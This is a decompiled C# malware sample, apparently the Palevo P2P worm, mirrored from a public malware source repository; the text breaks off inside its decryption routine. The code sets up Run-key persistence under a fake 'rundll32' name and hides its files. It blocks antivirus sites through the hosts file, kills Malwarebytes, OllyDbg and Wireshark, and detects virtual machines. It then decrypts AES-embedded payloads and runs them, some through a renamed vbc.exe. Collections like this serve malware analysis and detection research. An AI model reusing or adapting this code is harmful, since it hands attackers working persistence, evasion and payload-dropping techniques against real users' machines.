mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
646 lines
441 KiB
C#
646 lines
441 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: pizde
|
|||
|
// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using My;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Security.Cryptography;
|
|||
|
using System.Text;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
[StandardModule]
|
|||
|
internal sealed class pizde
|
|||
|
{
|
|||
|
private static string iohouh7877 = "GDGDF54545";
|
|||
|
private static string HostEditing = "%28%";
|
|||
|
private static string antis = "%29%";
|
|||
|
private static string stuff = "%something%";
|
|||
|
private static object Devices;
|
|||
|
private static string Grafikadapter;
|
|||
|
private static string RegionA = "SELECT * FROM Win32_VideoController";
|
|||
|
|
|||
|
[STAThread]
|
|||
|
public static void Main()
|
|||
|
{
|
|||
|
label_0:
|
|||
|
int num1;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 1;
|
|||
|
label_1:
|
|||
|
int num3 = 2;
|
|||
|
string processName = Process.GetCurrentProcess().ProcessName;
|
|||
|
label_2:
|
|||
|
num3 = 3;
|
|||
|
Process.GetProcessesByName(processName);
|
|||
|
label_3:
|
|||
|
num3 = 4;
|
|||
|
if (Operators.CompareString(pizde.iohouh7877, "hhhhhhhhhheeeee", false) != 0)
|
|||
|
goto label_11;
|
|||
|
label_4:
|
|||
|
num3 = 5;
|
|||
|
object tempPath1 = (object) Path.GetTempPath();
|
|||
|
label_5:
|
|||
|
num3 = 6;
|
|||
|
object executablePath = (object) Application.ExecutablePath;
|
|||
|
label_6:
|
|||
|
num3 = 7;
|
|||
|
object fullPath = (object) Path.GetFullPath(Conversions.ToString(executablePath));
|
|||
|
label_7:
|
|||
|
num3 = 8;
|
|||
|
FileAttributes fileAttributes1 = FileAttributes.Hidden | FileAttributes.System;
|
|||
|
label_8:
|
|||
|
num3 = 9;
|
|||
|
MyProject.Computer.Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("rundll32", Operators.ConcatenateObject(tempPath1, (object) "rundll32 .exe"));
|
|||
|
label_9:
|
|||
|
num3 = 10;
|
|||
|
FileSystem.FileCopy(Conversions.ToString(fullPath), Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath1, (object) "\\"), (object) "rundll32 .exe")));
|
|||
|
label_10:
|
|||
|
num3 = 11;
|
|||
|
File.SetAttributes(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath1, (object) "\\"), (object) "rundll32 .exe")), fileAttributes1);
|
|||
|
label_11:
|
|||
|
num3 = 13;
|
|||
|
if (Operators.CompareString(pizde.HostEditing, "hhhhhhhhhheeeee", false) != 0)
|
|||
|
goto label_13;
|
|||
|
label_12:
|
|||
|
num3 = 14;
|
|||
|
pizde.HostEdit();
|
|||
|
goto label_14;
|
|||
|
label_13:
|
|||
|
num3 = 16;
|
|||
|
label_14:
|
|||
|
num3 = 18;
|
|||
|
pizde.AntiMalwarebytes();
|
|||
|
label_15:
|
|||
|
num3 = 19;
|
|||
|
pizde.AntiOllydbg();
|
|||
|
label_16:
|
|||
|
num3 = 20;
|
|||
|
pizde.AntiWireshark();
|
|||
|
label_17:
|
|||
|
num3 = 21;
|
|||
|
pizde.AntiVirtualBox();
|
|||
|
label_18:
|
|||
|
num3 = 22;
|
|||
|
pizde.AntiVirtualPC();
|
|||
|
label_19:
|
|||
|
num3 = 23;
|
|||
|
pizde.AntiVmWare();
|
|||
|
label_20:
|
|||
|
num3 = 24;
|
|||
|
pizde.IsDebuggerPresent();
|
|||
|
label_21:
|
|||
|
num3 = 25;
|
|||
|
string s1 = "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
|
|||
|
label_22:
|
|||
|
num3 = 26;
|
|||
|
byte[] DAS4DA3 = pizde.okitokjwe33(Convert.FromBase64String(s1));
|
|||
|
label_23:
|
|||
|
num3 = 27;
|
|||
|
string str1;
|
|||
|
string s2 = str1;
|
|||
|
label_24:
|
|||
|
num3 = 28;
|
|||
|
byte[] data1 = pizde.okitokjwe33(Convert.FromBase64String(s2));
|
|||
|
label_25:
|
|||
|
num3 = 29;
|
|||
|
string str2;
|
|||
|
string s3 = str2;
|
|||
|
label_26:
|
|||
|
num3 = 30;
|
|||
|
pizde.decrypt(Convert.FromBase64String(s3), "parola");
|
|||
|
label_27:
|
|||
|
num3 = 31;
|
|||
|
string str3;
|
|||
|
string s4 = str3;
|
|||
|
label_28:
|
|||
|
num3 = 32;
|
|||
|
byte[] data2 = pizde.okitokjwe33(Convert.FromBase64String(s4));
|
|||
|
label_29:
|
|||
|
num3 = 33;
|
|||
|
Encoding.GetEncoding(1252).GetBytes(s1);
|
|||
|
label_30:
|
|||
|
num3 = 34;
|
|||
|
object tempPath2 = (object) Path.GetTempPath();
|
|||
|
label_31:
|
|||
|
num3 = 35;
|
|||
|
Directory.CreateDirectory(Conversions.ToString(Operators.ConcatenateObject(tempPath2, (object) "winamp")));
|
|||
|
label_32:
|
|||
|
num3 = 36;
|
|||
|
string VVVVVVCAE = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe"));
|
|||
|
label_33:
|
|||
|
num3 = 37;
|
|||
|
string sourceFileName = "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe";
|
|||
|
label_34:
|
|||
|
num3 = 38;
|
|||
|
string str4 = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe"));
|
|||
|
label_35:
|
|||
|
num3 = 39;
|
|||
|
if (File.Exists(str4))
|
|||
|
goto label_37;
|
|||
|
label_36:
|
|||
|
num3 = 40;
|
|||
|
File.Copy(sourceFileName, str4);
|
|||
|
label_37:
|
|||
|
num3 = 42;
|
|||
|
FileAttributes fileAttributes2 = FileAttributes.Hidden | FileAttributes.System;
|
|||
|
label_38:
|
|||
|
num3 = 43;
|
|||
|
File.SetAttributes(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe")), fileAttributes2);
|
|||
|
label_39:
|
|||
|
num3 = 44;
|
|||
|
if (pizde.IsProcessRunning4("nothong.exe"))
|
|||
|
goto label_41;
|
|||
|
label_40:
|
|||
|
num3 = 45;
|
|||
|
buffy.mickey(DAS4DA3, VVVVVVCAE);
|
|||
|
label_41:
|
|||
|
num3 = 47;
|
|||
|
if (pizde.IsProcessRunning2("%temp%.exe"))
|
|||
|
goto label_46;
|
|||
|
label_42:
|
|||
|
num3 = 48;
|
|||
|
if (pizde.IsProcessRunning5("something.exe"))
|
|||
|
goto label_46;
|
|||
|
label_43:
|
|||
|
num3 = 49;
|
|||
|
string temp1 = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
|
|||
|
label_44:
|
|||
|
num3 = 50;
|
|||
|
MyProject.Computer.FileSystem.WriteAllBytes(temp1 + "\\%temp%.exe", data2, false);
|
|||
|
label_45:
|
|||
|
num3 = 51;
|
|||
|
Process.Start(temp1 + "\\%temp%.exe");
|
|||
|
label_46:
|
|||
|
num3 = 54;
|
|||
|
if (pizde.IsProcessRunning3("%tmp%.exe"))
|
|||
|
goto label_50;
|
|||
|
label_47:
|
|||
|
num3 = 55;
|
|||
|
string temp2 = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
|
|||
|
label_48:
|
|||
|
num3 = 56;
|
|||
|
MyProject.Computer.FileSystem.WriteAllBytes(temp2 + "\\%tmp%.exe", data1, false);
|
|||
|
label_49:
|
|||
|
num3 = 57;
|
|||
|
Process.Start(temp2 + "\\%tmp%.exe");
|
|||
|
label_50:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_57;
|
|||
|
label_52:
|
|||
|
num2 = num3;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 1:
|
|||
|
int num4 = num2 + 1;
|
|||
|
num2 = 0;
|
|||
|
switch (num4)
|
|||
|
{
|
|||
|
case 1:
|
|||
|
goto label_0;
|
|||
|
case 2:
|
|||
|
goto label_1;
|
|||
|
case 3:
|
|||
|
goto label_2;
|
|||
|
case 4:
|
|||
|
goto label_3;
|
|||
|
case 5:
|
|||
|
goto label_4;
|
|||
|
case 6:
|
|||
|
goto label_5;
|
|||
|
case 7:
|
|||
|
goto label_6;
|
|||
|
case 8:
|
|||
|
goto label_7;
|
|||
|
case 9:
|
|||
|
goto label_8;
|
|||
|
case 10:
|
|||
|
goto label_9;
|
|||
|
case 11:
|
|||
|
goto label_10;
|
|||
|
case 12:
|
|||
|
case 13:
|
|||
|
goto label_11;
|
|||
|
case 14:
|
|||
|
goto label_12;
|
|||
|
case 15:
|
|||
|
case 17:
|
|||
|
case 18:
|
|||
|
goto label_14;
|
|||
|
case 16:
|
|||
|
goto label_13;
|
|||
|
case 19:
|
|||
|
goto label_15;
|
|||
|
case 20:
|
|||
|
goto label_16;
|
|||
|
case 21:
|
|||
|
goto label_17;
|
|||
|
case 22:
|
|||
|
goto label_18;
|
|||
|
case 23:
|
|||
|
goto label_19;
|
|||
|
case 24:
|
|||
|
goto label_20;
|
|||
|
case 25:
|
|||
|
goto label_21;
|
|||
|
case 26:
|
|||
|
goto label_22;
|
|||
|
case 27:
|
|||
|
goto label_23;
|
|||
|
case 28:
|
|||
|
goto label_24;
|
|||
|
case 29:
|
|||
|
goto label_25;
|
|||
|
case 30:
|
|||
|
goto label_26;
|
|||
|
case 31:
|
|||
|
goto label_27;
|
|||
|
case 32:
|
|||
|
goto label_28;
|
|||
|
case 33:
|
|||
|
goto label_29;
|
|||
|
case 34:
|
|||
|
goto label_30;
|
|||
|
case 35:
|
|||
|
goto label_31;
|
|||
|
case 36:
|
|||
|
goto label_32;
|
|||
|
case 37:
|
|||
|
goto label_33;
|
|||
|
case 38:
|
|||
|
goto label_34;
|
|||
|
case 39:
|
|||
|
goto label_35;
|
|||
|
case 40:
|
|||
|
goto label_36;
|
|||
|
case 41:
|
|||
|
case 42:
|
|||
|
goto label_37;
|
|||
|
case 43:
|
|||
|
goto label_38;
|
|||
|
case 44:
|
|||
|
goto label_39;
|
|||
|
case 45:
|
|||
|
goto label_40;
|
|||
|
case 46:
|
|||
|
case 47:
|
|||
|
goto label_41;
|
|||
|
case 48:
|
|||
|
goto label_42;
|
|||
|
case 49:
|
|||
|
goto label_43;
|
|||
|
case 50:
|
|||
|
goto label_44;
|
|||
|
case 51:
|
|||
|
goto label_45;
|
|||
|
case 52:
|
|||
|
case 53:
|
|||
|
case 54:
|
|||
|
goto label_46;
|
|||
|
case 55:
|
|||
|
goto label_47;
|
|||
|
case 56:
|
|||
|
goto label_48;
|
|||
|
case 57:
|
|||
|
goto label_49;
|
|||
|
case 58:
|
|||
|
goto label_50;
|
|||
|
case 59:
|
|||
|
goto label_57;
|
|||
|
}
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_52;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_57:
|
|||
|
if (num2 == 0)
|
|||
|
return;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
|
|||
|
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern int IsDebuggerPresent();
|
|||
|
|
|||
|
public static void Main2()
|
|||
|
{
|
|||
|
if (pizde.IsDebuggerPresent() == 1)
|
|||
|
Console.WriteLine("Debugger Is Present");
|
|||
|
else
|
|||
|
Console.WriteLine("Debugger Not Present");
|
|||
|
}
|
|||
|
|
|||
|
private static void HostEdit()
|
|||
|
{
|
|||
|
StreamWriter streamWriter = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\drivers\\etc\\\\hosts");
|
|||
|
streamWriter.Write("127.0.0.1 www.virustotal.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 virustotal.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 novirusthanks.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 vscan.novirusthanks.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 virusscan.jotti.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.virusscan.jotti.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 virscan.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.virscan.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 virus-trap.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.virus-trap.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 filterbit.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.filterbit.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 viruschief.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.viruschief.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 kaspersky.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.kaspersky.com");
|
|||
|
streamWriter.Dispose();
|
|||
|
}
|
|||
|
|
|||
|
public static bool AntiVirtualBox()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
pizde.getDevices();
|
|||
|
flag = Operators.CompareString(pizde.Grafikadapter, "VirtualBox Graphics Adapter", false) == 0;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
public static bool AntiVmWare()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
pizde.getDevices();
|
|||
|
flag = Operators.CompareString(pizde.Grafikadapter, "VMware SVGA II", false) == 0;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
public static bool AntiVirtualPC()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
pizde.getDevices();
|
|||
|
flag = Operators.CompareString(pizde.Grafikadapter, "VM Additions S3 Trio32/64", false) == 0;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
private static void getDevices()
|
|||
|
{
|
|||
|
// ISSUE: unable to decompile the method.
|
|||
|
}
|
|||
|
|
|||
|
public static void AntiMalwarebytes()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mbam", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static void AntiOllydbg()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ollydbg", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static void AntiWireshark()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "wireshark", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static bool IsProcessRunning2(string name)
|
|||
|
{
|
|||
|
Process[] processesByName = Process.GetProcessesByName("%temp%");
|
|||
|
int index = 0;
|
|||
|
if (index >= processesByName.Length)
|
|||
|
{
|
|||
|
bool flag;
|
|||
|
return flag;
|
|||
|
}
|
|||
|
return processesByName[index] != null;
|
|||
|
}
|
|||
|
|
|||
|
private static bool IsProcessRunning3(string name)
|
|||
|
{
|
|||
|
Process[] processesByName = Process.GetProcessesByName("%tmp%");
|
|||
|
int index = 0;
|
|||
|
if (index >= processesByName.Length)
|
|||
|
{
|
|||
|
bool flag;
|
|||
|
return flag;
|
|||
|
}
|
|||
|
return processesByName[index] != null;
|
|||
|
}
|
|||
|
|
|||
|
private static bool IsProcessRunning4(string name)
|
|||
|
{
|
|||
|
Process[] processesByName = Process.GetProcessesByName("nothong");
|
|||
|
int index = 0;
|
|||
|
if (index >= processesByName.Length)
|
|||
|
{
|
|||
|
bool flag;
|
|||
|
return flag;
|
|||
|
}
|
|||
|
return processesByName[index] != null;
|
|||
|
}
|
|||
|
|
|||
|
private static bool IsProcessRunning5(string name)
|
|||
|
{
|
|||
|
Process[] processesByName = Process.GetProcessesByName("something");
|
|||
|
int index = 0;
|
|||
|
if (index >= processesByName.Length)
|
|||
|
{
|
|||
|
bool flag;
|
|||
|
return flag;
|
|||
|
}
|
|||
|
return processesByName[index] != null;
|
|||
|
}
|
|||
|
|
|||
|
public static byte[] okitokjwe33(byte[] data)
|
|||
|
{
|
|||
|
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
|
|||
|
{
|
|||
|
rijndaelManaged.IV = new byte[16]
|
|||
|
{
|
|||
|
(byte) 1,
|
|||
|
(byte) 2,
|
|||
|
(byte) 3,
|
|||
|
(byte) 4,
|
|||
|
(byte) 5,
|
|||
|
(byte) 6,
|
|||
|
(byte) 7,
|
|||
|
(byte) 8,
|
|||
|
(byte) 9,
|
|||
|
(byte) 1,
|
|||
|
(byte) 2,
|
|||
|
(byte) 3,
|
|||
|
(byte) 4,
|
|||
|
(byte) 5,
|
|||
|
(byte) 6,
|
|||
|
(byte) 7
|
|||
|
};
|
|||
|
rijndaelManaged.Key = new byte[16]
|
|||
|
{
|
|||
|
(byte) 7,
|
|||
|
(byte) 6,
|
|||
|
(byte) 5,
|
|||
|
(byte) 4,
|
|||
|
(byte) 3,
|
|||
|
(byte) 2,
|
|||
|
